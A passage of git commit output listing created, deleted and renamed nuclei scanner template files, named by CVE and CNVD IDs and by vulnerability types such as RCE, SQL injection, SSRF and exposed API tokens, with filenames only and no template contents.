mode 100644 nuclei-templates/CVE-2024/CVE-2024-7354.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7423.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7716.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7888.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7891.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7955.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8031.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8242.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8269.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8522.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8529.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8622.yaml create mode 100644 
nuclei-templates/CVE-2024/CVE-2024-8656.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8663.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8664.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8665.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8714.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8730.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8731.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8732.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8734.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8737.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8742.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8747.yaml delete mode 100644 nuclei-templates/Other/0xlfi2.yaml delete mode 100644 nuclei-templates/Other/0xlfifuzz1.yaml create mode 100644 nuclei-templates/Other/3cx-management-console-2.yaml delete mode 100644 nuclei-templates/Other/3cx-management-console.yaml create mode 100644 nuclei-templates/Other/3cx.yaml rename nuclei-templates/Other/{3gmeeting-fileRead.yaml => 3gmeeting-fileread.yaml} (100%) delete mode 100644 nuclei-templates/Other/403-bypass_method.yaml delete mode 100644 nuclei-templates/Other/403-bypass_xheaders.yaml delete mode 100644 nuclei-templates/Other/403-bypass_xrewriteurl.yaml rename nuclei-templates/Other/{74cms-sqli-9.yaml => 74cms-sqli-10.yaml} (100%) create mode 100644 nuclei-templates/Other/74cms-sqli-8.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-1.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-2.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-3.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-4.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-5.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-6.yaml create mode 100644 nuclei-templates/Other/ApacheStruts-RCE.yaml create mode 100644 
nuclei-templates/Other/CNNVD-200705-315.yaml rename nuclei-templates/Other/{cnvd-2019-01348-1040.yaml => CNVD-2019-01348.yaml} (100%) create mode 100644 nuclei-templates/Other/CNVD-2019-19299.yaml create mode 100644 nuclei-templates/Other/CNVD-2020-23735.yaml delete mode 100644 nuclei-templates/Other/CNVD-2020-46552.yaml delete mode 100644 nuclei-templates/Other/CNVD-2020-67113.yaml delete mode 100644 nuclei-templates/Other/CNVD-2020-68596.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-01931.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-10543.yaml delete mode 100644 nuclei-templates/Other/CNVD-2021-14536.yaml delete mode 100644 nuclei-templates/Other/CNVD-2021-15822.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-15824.yaml delete mode 100644 nuclei-templates/Other/CNVD-2021-17369.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-30167-1.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-30167-2.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-49104.yaml create mode 100644 nuclei-templates/Other/CVE_2023_51467.yaml create mode 100644 nuclei-templates/Other/Confluence-SSRF.yaml rename nuclei-templates/Other/{dse855.yaml => DSE855.yaml} (100%) rename nuclei-templates/Other/{Dahua_getFaceCapture_Sqli.yaml => Dahua_Video_FileUpload.yaml} (100%) rename nuclei-templates/Other/{doccms-keyword-sqli.yaml => DocCMS-keyword-sqli.yaml} (100%) delete mode 100755 nuclei-templates/Other/Dotnetcms-SQLi.yaml create mode 100644 nuclei-templates/Other/Dynatrace-token.yaml rename nuclei-templates/Other/{empirecms-list-sqli.yaml => EmpireCMS-list-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/GLPI-9.3.3-SQL-Injection.yaml delete mode 100644 nuclei-templates/Other/GT-AC2900-login.yaml rename nuclei-templates/Other/{google-api-7772.yaml => Google-api.yaml} (100%) delete mode 100644 nuclei-templates/Other/Grafana-file-read.yaml rename nuclei-templates/Other/{Hikvision_Env_Information_Leakage.yaml => 
Hikvision_iVMS-8700_Fileupload_report.yaml} (100%) create mode 100644 nuclei-templates/Other/JBoss-SSRF.yaml create mode 100644 nuclei-templates/Other/JeeSite-default-login.yaml create mode 100644 nuclei-templates/Other/Jenkins-RCE.yaml rename nuclei-templates/Other/{kingdee-sqli.yaml => Kingdee-sqli.yaml} (100%) rename nuclei-templates/Other/{kingsoft-upload.yaml => Kingsoft-upload.yaml} (100%) rename nuclei-templates/Other/{magicflow-sqli.yaml => MagicFlow-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/Mailchimp-api.yaml create mode 100644 nuclei-templates/Other/Mailgun-api.yaml delete mode 100644 nuclei-templates/Other/Mantis-Default_login.yaml create mode 100644 nuclei-templates/Other/OpenTSDB-RCE-1.yaml create mode 100644 nuclei-templates/Other/OpenTSDB-RCE-2.yaml delete mode 100644 nuclei-templates/Other/Oracle-OAM-XSS.yaml create mode 100644 nuclei-templates/Other/PeopleSoft-XXE-1.yaml create mode 100644 nuclei-templates/Other/PeopleSoft-XXE-2.yaml delete mode 100644 nuclei-templates/Other/RCE-CVE-2021-41773.yaml delete mode 100644 nuclei-templates/Other/RedMine-Detect.yaml create mode 100644 nuclei-templates/Other/Redmine-Default-Login.yaml rename nuclei-templates/Other/{Ruijie_NBR_Router_fileupload.yaml => Ruijie_EXCU_SHELL.yaml} (100%) delete mode 100644 nuclei-templates/Other/SAP-NetWeaver-rce.yaml delete mode 100644 nuclei-templates/Other/Sap-redirect.yaml rename nuclei-templates/Other/{seagate-media-rce.yaml => Seagate-media-rce.yaml} (100%) create mode 100644 nuclei-templates/Other/Shellshock-RCE-1.yaml create mode 100644 nuclei-templates/Other/Shopify-custom-token.yaml rename nuclei-templates/Other/{shopify-token.yaml => Shopify-token.yaml} (100%) rename nuclei-templates/Other/{slack-api-11864.yaml => Slack-api.yaml} (100%) create mode 100755 nuclei-templates/Other/SpringBoot-Heapdump.yaml delete mode 100644 nuclei-templates/Other/Springboot-Heapdump.yaml create mode 100755 nuclei-templates/Other/Springboot-Httptrace.yaml rename 
nuclei-templates/Other/{square-access-token.yaml => Square-access-token.yaml} (100%) rename nuclei-templates/Other/{square-oauth-secret.yaml => Square-oauth-secret.yaml} (100%) delete mode 100644 nuclei-templates/Other/SquirrelMail.yaml delete mode 100644 nuclei-templates/Other/Symantec-Messaging-Gateway.yaml delete mode 100644 nuclei-templates/Other/SymfonyRCE.yaml rename nuclei-templates/Other/{tenda-leakage.yaml => Tenda-leakage.yaml} (100%) delete mode 100755 nuclei-templates/Other/ThinkPHP-501-RCE.yaml create mode 100755 nuclei-templates/Other/UnAuthenticated-Tensorboard.yaml delete mode 100644 nuclei-templates/Other/WSO2-2019-0598.yaml rename nuclei-templates/Other/{X-Host .yaml => X-Host.yaml} (100%) rename nuclei-templates/Other/{X-Remote-IP .yaml => X-Remote-IP.yaml} (100%) rename nuclei-templates/Other/{abyss-web-server-13.yaml => abyss-web-server.yaml} (100%) create mode 100644 nuclei-templates/Other/accent-microcomputers-lfi-14.yaml delete mode 100644 nuclei-templates/Other/accent-microcomputers-lfi-16.yaml rename nuclei-templates/Other/{access-log.yaml => access-log-22.yaml} (100%) create mode 100644 nuclei-templates/Other/accessibility-helper-xss-19.yaml delete mode 100644 nuclei-templates/Other/accessibility-helper-xss.yaml rename nuclei-templates/Other/{acme-xss-28.yaml => acme-xss-30.yaml} (100%) create mode 100644 nuclei-templates/Other/acquia-takeover-35.yaml delete mode 100644 nuclei-templates/Other/acquia-takeover.yaml rename nuclei-templates/Other/{acrolinx-dashboard.yaml => acrolinx-dashboard-36.yaml} (100%) delete mode 100644 nuclei-templates/Other/activemq-default-login-48.yaml create mode 100644 nuclei-templates/Other/activemq-default-login.yaml create mode 100644 nuclei-templates/Other/activemq-panel-50.yaml delete mode 100644 nuclei-templates/Other/activemq-panel-52.yaml create mode 100644 nuclei-templates/Other/activemq_apollo.yaml rename nuclei-templates/Other/{acunetix-panel-59.yaml => acunetix-panel-56.yaml} (100%) create mode 100644 
nuclei-templates/Other/ad-widget-lfi-124.yaml delete mode 100644 nuclei-templates/Other/ad-widget-lfi-126.yaml create mode 100644 nuclei-templates/Other/adb-backup-enabled-61.yaml delete mode 100644 nuclei-templates/Other/adb-backup-enabled-62.yaml delete mode 100644 nuclei-templates/Other/addeventlistener-detect-64.yaml create mode 100644 nuclei-templates/Other/addeventlistener-detect-66.yaml delete mode 100644 nuclei-templates/Other/adiscon-loganalyzer.yaml create mode 100644 nuclei-templates/Other/admin-word-count-column-lfi-81.yaml delete mode 100644 nuclei-templates/Other/admin-word-count-column-lfi.yaml create mode 100644 nuclei-templates/Other/adminer-panel-75.yaml delete mode 100644 nuclei-templates/Other/adminer-panel-fuzz-73.yaml create mode 100644 nuclei-templates/Other/adminer-panel-fuzz.yaml delete mode 100644 nuclei-templates/Other/adminer-panel.yaml rename nuclei-templates/Other/{adobe-coldfusion-detect-83.yaml => adobe-coldfusion-detect-82.yaml} (100%) rename nuclei-templates/Other/{adobe-coldfusion-error-detect-86.yaml => adobe-coldfusion-error-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/adobe-component-login-89.yaml delete mode 100644 nuclei-templates/Other/adobe-component-login-90.yaml delete mode 100644 nuclei-templates/Other/adobe-connect-central-login-93.yaml create mode 100644 nuclei-templates/Other/adobe-connect-central-login-97.yaml rename nuclei-templates/Other/{adobe-connect-username-exposure.yaml => adobe-connect-username-exposure-98.yaml} (100%) rename nuclei-templates/Other/{adobe-connect-version-102.yaml => adobe-connect-version.yaml} (100%) create mode 100644 nuclei-templates/Other/adobe-experience-manager-login-105.yaml delete mode 100644 nuclei-templates/Other/adobe-experience-manager-login-109.yaml create mode 100644 nuclei-templates/Other/adobe-media-server-112.yaml delete mode 100644 nuclei-templates/Other/adobe-media-server.yaml create mode 100644 nuclei-templates/Other/advanced-access-manager-lfi-118.yaml 
delete mode 100644 nuclei-templates/Other/advanced-access-manager-lfi.yaml delete mode 100644 nuclei-templates/Other/aem-bg-servlet-127.yaml create mode 100644 nuclei-templates/Other/aem-bg-servlet-129.yaml rename nuclei-templates/Other/{aem-crx-bypass-134.yaml => aem-crx-bypass-132.yaml} (100%) rename nuclei-templates/Other/{aem-default-get-servlet.yaml => aem-default-get-servlet-139.yaml} (100%) delete mode 100644 nuclei-templates/Other/aem-default-login-140.yaml create mode 100644 nuclei-templates/Other/aem-default-login-141.yaml rename nuclei-templates/Other/{aem-detection.yaml => aem-detection-145.yaml} (100%) rename nuclei-templates/Other/{aem-gql-servlet-147.yaml => aem-gql-servlet-150.yaml} (100%) rename nuclei-templates/Other/{aem-groovyconsole-153.yaml => aem-groovyconsole.yaml} (100%) delete mode 100644 nuclei-templates/Other/aem-hash-querybuilder-160.yaml create mode 100644 nuclei-templates/Other/aem-hash-querybuilder.yaml create mode 100644 nuclei-templates/Other/aem-jcr-querybuilder-162.yaml delete mode 100644 nuclei-templates/Other/aem-jcr-querybuilder-164.yaml rename nuclei-templates/Other/{aem-merge-metadata-servlet.yaml => aem-merge-metadata-servlet-172.yaml} (100%) create mode 100644 nuclei-templates/Other/aem-querybuilder-feed-servlet-175.yaml delete mode 100644 nuclei-templates/Other/aem-querybuilder-feed-servlet-177.yaml delete mode 100644 nuclei-templates/Other/aem-querybuilder-internal-path-read-180.yaml create mode 100644 nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml create mode 100644 nuclei-templates/Other/aem-querybuilder-json-servlet-184.yaml delete mode 100644 nuclei-templates/Other/aem-querybuilder-json-servlet.yaml delete mode 100644 nuclei-templates/Other/aem-secrets.yaml create mode 100644 nuclei-templates/Other/aem-setpreferences-xss-189.yaml delete mode 100644 nuclei-templates/Other/aem-setpreferences-xss.yaml create mode 100644 nuclei-templates/Other/aem-userinfo-servlet-190.yaml delete mode 100644 
nuclei-templates/Other/aem-userinfo-servlet-192.yaml delete mode 100644 nuclei-templates/Other/aem-wcm-suggestions-servlet-194.yaml create mode 100644 nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml delete mode 100644 nuclei-templates/Other/aem-xss-childlist-selector-197.yaml create mode 100644 nuclei-templates/Other/aem-xss-childlist-selector.yaml delete mode 100644 nuclei-templates/Other/aerohive-netconfig-ui-201.yaml create mode 100644 nuclei-templates/Other/aerohive-netconfig-ui.yaml delete mode 100644 nuclei-templates/Other/aftership-takeover-203.yaml create mode 100644 nuclei-templates/Other/aftership-takeover-206.yaml rename nuclei-templates/Other/{agilecrm-takeover.yaml => agilecrm-takeover-209.yaml} (100%) delete mode 100644 nuclei-templates/Other/aha-takeover-214.yaml create mode 100644 nuclei-templates/Other/aha-takeover-216.yaml rename nuclei-templates/Other/{AIC-leakage.yaml => aic-leakage.yaml} (100%) delete mode 100644 nuclei-templates/Other/aims-password-mgmt-client-219.yaml create mode 100644 nuclei-templates/Other/aims-password-mgmt-client.yaml create mode 100644 nuclei-templates/Other/aims-password-portal-222.yaml delete mode 100644 nuclei-templates/Other/aims-password-portal-224.yaml delete mode 100644 nuclei-templates/Other/airflow-configuration-exposure-230.yaml create mode 100644 nuclei-templates/Other/airflow-configuration-exposure.yaml delete mode 100644 nuclei-templates/Other/airflow-debug-233.yaml create mode 100644 nuclei-templates/Other/airflow-debug.yaml create mode 100644 nuclei-templates/Other/airflow-default-login-236.yaml delete mode 100644 nuclei-templates/Other/airflow-default-login.yaml rename nuclei-templates/Other/{airflow-detect-240.yaml => airflow-detect-239.yaml} (100%) create mode 100644 nuclei-templates/Other/airflow-panel-242.yaml delete mode 100644 nuclei-templates/Other/airflow-panel-245.yaml rename nuclei-templates/Other/{Airflow-unauthorized.yaml => airflow-unauthorized.yaml} (100%) create mode 100644 
nuclei-templates/Other/aj-report.yaml create mode 100644 nuclei-templates/Other/akamai-arl-xss-248.yaml delete mode 100644 nuclei-templates/Other/akamai-arl-xss-249.yaml rename nuclei-templates/Other/{akamai-cloudtest.yaml => akamai-cloudtest-254.yaml} (100%) delete mode 100644 nuclei-templates/Other/alfacgiapi-wordpress-256.yaml create mode 100644 nuclei-templates/Other/alfacgiapi-wordpress.yaml create mode 100644 nuclei-templates/Other/alfresco-detect-258.yaml delete mode 100644 nuclei-templates/Other/alfresco-detect-259.yaml rename nuclei-templates/Other/{Alibaba-Anyproxy-fileRead.yaml => alibaba-anyproxy-fileread.yaml} (100%) rename nuclei-templates/Other/{alibaba-canal-default-password.yaml => alibaba-canal-default-password-262.yaml} (100%) create mode 100644 nuclei-templates/Other/alphaweb-default-login-275.yaml delete mode 100644 nuclei-templates/Other/alphaweb-default-login-277.yaml rename nuclei-templates/Other/{amazon-docker-config.yaml => amazon-docker-config-280.yaml} (100%) create mode 100755 nuclei-templates/Other/amazon-mws-auth-token-11845.yaml delete mode 100644 nuclei-templates/Other/amazon-mws-auth-token-value.yaml rename nuclei-templates/Other/{amazon-mws-auth-token-283.yaml => amazon-mws-auth-token.yaml} (100%) create mode 100644 nuclei-templates/Other/ambari-default-login-287.yaml delete mode 100644 nuclei-templates/Other/ambari-default-login-290.yaml rename nuclei-templates/Other/{ambari-exposure-294.yaml => ambari-exposure-291.yaml} (100%) delete mode 100644 nuclei-templates/Other/amcrest-login-297.yaml create mode 100644 nuclei-templates/Other/amcrest-login.yaml rename nuclei-templates/Other/{ampps-admin-panel-306.yaml => ampps-admin-panel-305.yaml} (100%) rename nuclei-templates/Other/{ampps-dirlisting.yaml => ampps-dirlisting-308.yaml} (100%) delete mode 100644 nuclei-templates/Other/ampps-panel-309.yaml create mode 100644 nuclei-templates/Other/ampps-panel-310.yaml delete mode 100644 
nuclei-templates/Other/android-debug-database-exposed-312.yaml create mode 100644 nuclei-templates/Other/android-debug-database-exposed.yaml rename nuclei-templates/Other/{anima-takeover.yaml => anima-takeover-317.yaml} (100%) rename nuclei-templates/Other/{Anni-fileDownload.yaml => anni-filedownload.yaml} (100%) rename nuclei-templates/Other/{announcekit-takeover-322.yaml => announcekit-takeover-324.yaml} (100%) delete mode 100644 nuclei-templates/Other/ansible-config-disclosure-326.yaml create mode 100644 nuclei-templates/Other/ansible-config-disclosure.yaml delete mode 100644 nuclei-templates/Other/ansible-semaphore-panel-327.yaml create mode 100644 nuclei-templates/Other/ansible-semaphore-panel.yaml delete mode 100644 nuclei-templates/Other/ansible-tower-exposure-331.yaml create mode 100644 nuclei-templates/Other/ansible-tower-exposure-332.yaml delete mode 100644 nuclei-templates/Other/antsword-backdoor-335.yaml create mode 100644 nuclei-templates/Other/antsword-backdoor.yaml rename nuclei-templates/Other/{AolynkBR304-weakPass.yaml => aolynkbr304-weakpass.yaml} (100%) rename nuclei-templates/Other/{APACHE-Ambari-weakPass.yaml => apache-ambari-weakpass.yaml} (100%) create mode 100644 nuclei-templates/Other/apache-apisix-panel-336.yaml delete mode 100644 nuclei-templates/Other/apache-apisix-panel-337.yaml create mode 100644 nuclei-templates/Other/apache-detect-348.yaml delete mode 100644 nuclei-templates/Other/apache-detect.yaml create mode 100644 nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml rename nuclei-templates/Other/{apache-dubbo-detect-351.yaml => apache-dubbo-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/apache-filename-enum-354.yaml delete mode 100644 nuclei-templates/Other/apache-filename-enum.yaml create mode 100644 nuclei-templates/Other/apache-flink-unauth-rce-356.yaml delete mode 100644 nuclei-templates/Other/apache-flink-unauth-rce-358.yaml rename nuclei-templates/Other/{apache-guacamole-361.yaml => 
apache-guacamole.yaml} (100%) rename nuclei-templates/Other/{default-cred-hertzbeat.yaml => apache-hertzbeat-default-login.yaml} (100%) rename nuclei-templates/Other/{apache-httpd-rce-362.yaml => apache-httpd-rce.yaml} (100%) create mode 100644 nuclei-templates/Other/apache-nifi-unauth.yaml create mode 100644 nuclei-templates/Other/apache-solr-file-read-368.yaml rename nuclei-templates/Other/{apache-solr-log4j-CVE-2021-44228.yaml => apache-solr-log4j-cve-2021-44228.yaml} (100%) rename nuclei-templates/Other/{apache-tomcat-CVE-2022-34305.yaml => apache-tomcat-cve-2022-34305.yaml} (100%) create mode 100644 nuclei-templates/Other/apachesolrlfissrf.yaml delete mode 100644 nuclei-templates/Other/apc-info-379.yaml create mode 100644 nuclei-templates/Other/apc-ups-login-381.yaml delete mode 100644 nuclei-templates/Other/apc-ups-login-382.yaml create mode 100644 nuclei-templates/Other/apc_info.yaml create mode 100644 nuclei-templates/Other/apeosport-v_c3375.yaml rename nuclei-templates/Other/{Apereo-Cas-rce.yaml => apereo-cas-rce.yaml} (100%) rename nuclei-templates/Other/{api-abstractapi.yaml => api-abstractapi-383.yaml} (100%) rename nuclei-templates/Other/{api-adafruit-io-387.yaml => api-adafruit-io.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-alienvault-390.yaml create mode 100644 nuclei-templates/Other/api-alienvault.yaml create mode 100644 nuclei-templates/Other/api-asana-393.yaml delete mode 100644 nuclei-templates/Other/api-asana.yaml delete mode 100644 nuclei-templates/Other/api-bingmaps-395.yaml create mode 100644 nuclei-templates/Other/api-bingmaps.yaml create mode 100644 nuclei-templates/Other/api-block-400.yaml delete mode 100644 nuclei-templates/Other/api-block.yaml create mode 100644 nuclei-templates/Other/api-calendly-404.yaml delete mode 100644 nuclei-templates/Other/api-calendly.yaml delete mode 100644 nuclei-templates/Other/api-clearbit-407.yaml create mode 100644 nuclei-templates/Other/api-clearbit.yaml rename 
nuclei-templates/Other/{api-cooperhewitt-411.yaml => api-cooperhewitt-409.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-debounce-414.yaml create mode 100644 nuclei-templates/Other/api-debounce.yaml create mode 100644 nuclei-templates/Other/api-deviantart.yaml create mode 100644 nuclei-templates/Other/api-dribbble-416.yaml delete mode 100644 nuclei-templates/Other/api-dribbble-417.yaml rename nuclei-templates/Other/{dropbox.yaml => api-dropbox-418.yaml} (100%) create mode 100644 nuclei-templates/Other/api-europeana-419.yaml delete mode 100644 nuclei-templates/Other/api-europeana.yaml rename nuclei-templates/Other/{api-facebook-422.yaml => api-facebook.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-festivo-425.yaml create mode 100644 nuclei-templates/Other/api-festivo.yaml rename nuclei-templates/Other/{api-fontawesome.yaml => api-fontawesome-426.yaml} (100%) rename nuclei-templates/Other/{api-fortitoken-cloud-427.yaml => api-fortitoken-cloud.yaml} (100%) create mode 100644 nuclei-templates/Other/api-google-drive-432.yaml delete mode 100644 nuclei-templates/Other/api-google-drive.yaml create mode 100644 nuclei-templates/Other/api-harvardart-433.yaml delete mode 100644 nuclei-templates/Other/api-harvardart-434.yaml rename nuclei-templates/Other/{api-heroku-435.yaml => api-heroku.yaml} (100%) create mode 100644 nuclei-templates/Other/api-hirak-rates-436.yaml delete mode 100644 nuclei-templates/Other/api-hirak-rates.yaml delete mode 100644 nuclei-templates/Other/api-hubspot-437.yaml rename nuclei-templates/Other/{api-iconfinder.yaml => api-iconfinder-438.yaml} (100%) create mode 100644 nuclei-templates/Other/api-improvmx-440.yaml delete mode 100644 nuclei-templates/Other/api-improvmx.yaml rename nuclei-templates/Other/{api-intercom.yaml => api-intercom-443.yaml} (100%) create mode 100644 nuclei-templates/Other/api-ipstack-444.yaml rename nuclei-templates/Other/{jumpcloud.yaml => api-jumpcloud.yaml} (100%) rename 
nuclei-templates/Other/{api-leanix.yaml => api-leanix-450.yaml} (100%) rename nuclei-templates/Other/{api-lokalise.yaml => api-lokalise-452.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-mailchimp.yaml rename nuclei-templates/Other/{api-malshare-457.yaml => api-malshare.yaml} (100%) create mode 100644 nuclei-templates/Other/api-malwarebazaar-458.yaml delete mode 100644 nuclei-templates/Other/api-malwarebazaar.yaml rename nuclei-templates/Other/{mapbox.yaml => api-mapbox-465.yaml} (100%) create mode 100644 nuclei-templates/Other/api-mojoauth-466.yaml delete mode 100644 nuclei-templates/Other/api-mojoauth.yaml delete mode 100644 nuclei-templates/Other/api-mywot-467.yaml create mode 100644 nuclei-templates/Other/api-mywot.yaml create mode 100644 nuclei-templates/Other/api-npm-471.yaml delete mode 100644 nuclei-templates/Other/api-npm.yaml delete mode 100644 nuclei-templates/Other/api-pastebin-477.yaml create mode 100644 nuclei-templates/Other/api-pastebin.yaml rename nuclei-templates/Other/{api-paypal.yaml => api-paypal-478.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-petfinder-480.yaml create mode 100644 nuclei-templates/Other/api-petfinder.yaml rename nuclei-templates/Other/{pivotaltracker.yaml => api-pivotaltracker-482.yaml} (100%) rename nuclei-templates/Other/{postmark.yaml => api-postmark-483.yaml} (100%) create mode 100644 nuclei-templates/Other/api-rijksmuseum-486.yaml delete mode 100644 nuclei-templates/Other/api-rijksmuseum.yaml delete mode 100644 nuclei-templates/Other/api-scanii-487.yaml create mode 100644 nuclei-templates/Other/api-scanii-488.yaml delete mode 100644 nuclei-templates/Other/api-spotify-495.yaml create mode 100644 nuclei-templates/Other/api-spotify.yaml delete mode 100644 nuclei-templates/Other/api-square-496.yaml create mode 100644 nuclei-templates/Other/api-square.yaml rename nuclei-templates/Other/{api-strava.yaml => api-strava-498.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-stytch-500.yaml create 
mode 100644 nuclei-templates/Other/api-stytch.yaml rename nuclei-templates/Other/{api-tink-504.yaml => api-tink.yaml} (100%) rename nuclei-templates/Other/{api-twitter-507.yaml => api-twitter.yaml} (100%) rename nuclei-templates/Other/{api-urlscan-508.yaml => api-urlscan.yaml} (100%) rename nuclei-templates/Other/{api-vercel.yaml => api-vercel-510.yaml} (100%) create mode 100644 nuclei-templates/Other/api-virustotal-512.yaml delete mode 100644 nuclei-templates/Other/api-virustotal.yaml rename nuclei-templates/Other/{visualstudio.yaml => api-visualstudio-513.yaml} (100%) rename nuclei-templates/Other/{wakatime.yaml => api-wakatime-514.yaml} (100%) rename nuclei-templates/Other/{api-youtube.yaml => api-youtube-519.yaml} (100%) rename nuclei-templates/Other/{apiman-panel-464.yaml => apiman-panel-462.yaml} (100%) delete mode 100644 nuclei-templates/Other/apisix-default-login-491.yaml create mode 100644 nuclei-templates/Other/apisix-default-login.yaml create mode 100644 nuclei-templates/Other/apollo-default-login-521.yaml delete mode 100644 nuclei-templates/Other/apollo-default-login.yaml create mode 100644 nuclei-templates/Other/apollo-server-detect-522.yaml delete mode 100644 nuclei-templates/Other/apollo-server-detect.yaml rename nuclei-templates/Other/{apple_app_site.yaml => apple-app-site-association-524.yaml} (100%) rename nuclei-templates/Other/{Application_level_dos.yaml => application_level_dos.yaml} (100%) create mode 100644 nuclei-templates/Other/application_security_gateway.yaml rename nuclei-templates/Other/{arcgis-panel-530.yaml => arcgis-panel-531.yaml} (100%) create mode 100644 nuclei-templates/Other/arcgis-rest-api-532.yaml delete mode 100644 nuclei-templates/Other/arcgis-rest-api-533.yaml create mode 100644 nuclei-templates/Other/argo_cd.yaml create mode 100644 nuclei-templates/Other/argocd-login-534.yaml delete mode 100644 nuclei-templates/Other/argocd-login.yaml rename nuclei-templates/Other/{artica-web-proxy-detect-544.yaml => 
artica-web-proxy-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/artifactory-anonymous-deploy.yaml create mode 100644 nuclei-templates/Other/artifactory_deploy.yaml create mode 100644 nuclei-templates/Other/aruba_instant.yaml rename nuclei-templates/Other/{asanhamayesh-lfi-553.yaml => asanhamayesh-lfi-552.yaml} (100%) create mode 100644 nuclei-templates/Other/aspose-file-download-561.yaml delete mode 100644 nuclei-templates/Other/aspose-file-download.yaml delete mode 100644 nuclei-templates/Other/aspose-ie-file-download-562.yaml create mode 100644 nuclei-templates/Other/aspose-ie-file-download-565.yaml create mode 100644 nuclei-templates/Other/aspose-pdf-file-download-568.yaml delete mode 100644 nuclei-templates/Other/aspose-pdf-file-download.yaml create mode 100644 nuclei-templates/Other/aspose-words-file-download-571.yaml delete mode 100644 nuclei-templates/Other/aspose-words-file-download-572.yaml create mode 100644 nuclei-templates/Other/aspx-debug-mode-577.yaml delete mode 100644 nuclei-templates/Other/aspx-debug-mode-578.yaml rename nuclei-templates/Other/{ASUSTOR-ADM-sqli.yaml => asustor-adm-sqli.yaml} (100%) rename nuclei-templates/Other/{ATHD-DVR-fileRead.yaml => athd-dvr-fileread.yaml} (100%) create mode 100644 nuclei-templates/Other/atlassian-crowd-panel-581.yaml delete mode 100644 nuclei-templates/Other/atlassian-crowd-panel.yaml create mode 100644 nuclei-templates/Other/aura_utility_services.yaml delete mode 100644 nuclei-templates/Other/autobahn-python-detect-593.yaml create mode 100644 nuclei-templates/Other/autobahn-python-detect-594.yaml rename nuclei-templates/Other/{automation-direct-596.yaml => automation-direct-597.yaml} (100%) create mode 100644 nuclei-templates/Other/avatier-password-management-604.yaml delete mode 100644 nuclei-templates/Other/avatier-password-management-605.yaml create mode 100644 nuclei-templates/Other/aviatrix-panel-608.yaml delete mode 100644 nuclei-templates/Other/aviatrix-panel.yaml rename 
nuclei-templates/Other/{AVideo-user-leakge.yaml => avideo-user-leakge.yaml} (100%) delete mode 100644 nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml create mode 100644 nuclei-templates/Other/avtech-avn801-camera-panel.yaml rename nuclei-templates/Other/{AVTECH-login-bypass.yaml => avtech-login-bypass.yaml} (100%) rename nuclei-templates/Other/{aws-access-id-620.yaml => aws-access-id-618.yaml} (100%) create mode 100644 nuclei-templates/Other/aws-access-key-value-622.yaml delete mode 100644 nuclei-templates/Other/aws-access-key-value-625.yaml create mode 100644 nuclei-templates/Other/aws-cloudfront-service-634.yaml delete mode 100644 nuclei-templates/Other/aws-cloudfront-service.yaml delete mode 100644 nuclei-templates/Other/aws-elastic-beanstalk-detect-644.yaml create mode 100644 nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml create mode 100644 nuclei-templates/Other/aws-redirect-652.yaml delete mode 100644 nuclei-templates/Other/aws-redirect-654.yaml create mode 100644 nuclei-templates/Other/axigen-webmail-662.yaml delete mode 100644 nuclei-templates/Other/axigen-webmail.yaml rename nuclei-templates/Other/{axiom-digitalocean-key-exposure-668.yaml => axiom-digitalocean-key-exposure-666.yaml} (100%) rename nuclei-templates/Other/{axis-happyaxis-669.yaml => axis-happyaxis-670.yaml} (100%) create mode 100644 nuclei-templates/Other/azkaban-default-login-671.yaml delete mode 100644 nuclei-templates/Other/azkaban-default-login-673.yaml rename nuclei-templates/Other/{azkaban-web-client.yaml => azkaban-web-client-677.yaml} (100%) create mode 100644 nuclei-templates/Other/azkaban.yaml create mode 100644 nuclei-templates/Other/azure-aks-api-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-aks-api-version-not-latest.yaml create mode 100644 nuclei-templates/Other/azure-aks-cni-not-configured.yaml create mode 100644 